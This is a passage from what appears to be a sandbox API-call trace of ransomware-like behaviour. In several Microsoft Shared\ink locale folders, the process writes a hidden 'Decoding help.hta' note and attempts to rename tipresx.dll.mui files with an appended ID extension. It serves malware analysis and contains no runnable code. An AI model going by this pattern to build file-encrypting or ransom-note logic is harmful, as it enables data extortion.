Shared\\ink\\it-IT\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.871] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.871] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.871] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*" [0060.871] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*") returned 64 [0060.871] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui" [0060.871] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui" [0060.871] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.871] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.873] FindNextFileW (in: hFindFile=0x10fbc758, lpFindFileData=0x2c7efd30 | out: lpFindFileData=0x2c7efd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9e26c68, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea015e21, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea015e21, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.873] FindClose (in: hFindFile=0x10fbc758 | out: hFindFile=0x10fbc758) returned 1 Thread: id = 895 os_tid = 0x7c4 [0055.199] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*", lpFindFileData=0x2c92fd30 | out: lpFindFileData=0x2c92fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc7d8 [0059.397] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.397] FindNextFileW (in: hFindFile=0x10fbc7d8, lpFindFileData=0x2c92fd30 | out: lpFindFileData=0x2c92fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.397] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.397] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.397] FindNextFileW (in: hFindFile=0x10fbc7d8, lpFindFileData=0x2c92fd30 | out: lpFindFileData=0x2c92fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe68981a0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6aad4b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6aad4b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.397] lstrcpyW (in: lpString1=0x2aa50e98, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*" [0059.397] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*") returned 64 [0059.397] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\Decoding help.hta" [0059.397] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\decoding help.hta")) returned 0xffffffff [0059.397] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.649] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2c92fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2c92fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.650] CloseHandle (hObject=0x4bc) returned 1 [0060.650] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.873] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.873] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.873] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*" [0060.873] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*") returned 64 [0060.873] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui" [0060.873] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui" [0060.873] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.874] FindNextFileW (in: hFindFile=0x10fbc7d8, lpFindFileData=0x2c92fd30 | out: lpFindFileData=0x2c92fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe68981a0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6aad4b6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6aad4b6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.874] FindClose (in: hFindFile=0x10fbc7d8 | out: hFindFile=0x10fbc7d8) returned 1 Thread: id = 896 os_tid = 0xb18 [0055.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*", lpFindFileData=0x2ca6fd30 | out: lpFindFileData=0x2ca6fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc818 [0059.398] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.398] FindNextFileW (in: hFindFile=0x10fbc818, lpFindFileData=0x2ca6fd30 | out: lpFindFileData=0x2ca6fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.398] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.398] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.398] FindNextFileW (in: hFindFile=0x10fbc818, lpFindFileData=0x2ca6fd30 | out: lpFindFileData=0x2ca6fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e1cef6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe507e4c6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe507e4c6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.398] lstrcpyW (in: lpString1=0x2a8a07e8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*" [0059.398] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*") returned 64 [0059.398] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\Decoding help.hta" [0059.398] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\decoding help.hta")) returned 0xffffffff [0059.398] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.651] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2ca6fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2ca6fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.652] CloseHandle (hObject=0x4bc) returned 1 [0060.652] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.874] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.874] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.874] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*" [0060.874] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*") returned 64 [0060.874] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui" [0060.874] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui" [0060.874] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.874] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.875] FindNextFileW (in: hFindFile=0x10fbc818, lpFindFileData=0x2ca6fd30 | out: lpFindFileData=0x2ca6fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e1cef6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe507e4c6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe507e4c6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.875] FindClose (in: hFindFile=0x10fbc818 | out: hFindFile=0x10fbc818) returned 1 Thread: id = 897 os_tid = 0x8d0 [0055.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\*.*", lpFindFileData=0x2cbafd30 | out: lpFindFileData=0x2cbafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f14180 [0062.529] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.529] FindNextFileW (in: hFindFile=0x10f14180, lpFindFileData=0x2cbafd30 | out: lpFindFileData=0x2cbafd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9fbd8be5, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaab41c3c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9fdc8b88, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.529] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.529] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.529] FindNextFileW (in: hFindFile=0x10f14180, lpFindFileData=0x2cbafd30 | out: lpFindFileData=0x2cbafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x710d74af, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x710d74af, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb08f, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-background.png", cAlternateFileName="")) returned 1 Thread: id = 898 os_tid = 0x870 [0055.200] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*", lpFindFileData=0x2ccefd30 | out: lpFindFileData=0x2ccefd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc958 [0059.403] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.403] FindNextFileW (in: hFindFile=0x10fbc958, lpFindFileData=0x2ccefd30 | out: lpFindFileData=0x2ccefd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.403] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.403] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.403] FindNextFileW (in: hFindFile=0x10fbc958, lpFindFileData=0x2ccefd30 | out: lpFindFileData=0x2ccefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe608f802, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe627e9bb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe62a4b18, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.403] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*" [0059.403] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*") returned 64 [0059.403] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\Decoding help.hta" [0059.403] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\decoding help.hta")) returned 0xffffffff [0059.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.659] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2ccefcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2ccefcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.660] CloseHandle (hObject=0x4bc) returned 1 [0060.660] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.878] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.878] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.878] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*" [0060.879] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*") returned 64 [0060.879] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui" [0060.879] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui" [0060.879] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.879] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.879] FindNextFileW (in: hFindFile=0x10fbc958, lpFindFileData=0x2ccefd30 | out: lpFindFileData=0x2ccefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe608f802, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe627e9bb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe62a4b18, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.879] FindClose (in: hFindFile=0x10fbc958 | out: hFindFile=0x10fbc958) returned 1 Thread: id = 899 os_tid = 0xb50 [0055.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*", lpFindFileData=0x2ce2fd30 | out: lpFindFileData=0x2ce2fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc998 [0059.404] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.404] FindNextFileW (in: hFindFile=0x10fbc998, lpFindFileData=0x2ce2fd30 | out: lpFindFileData=0x2ce2fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, 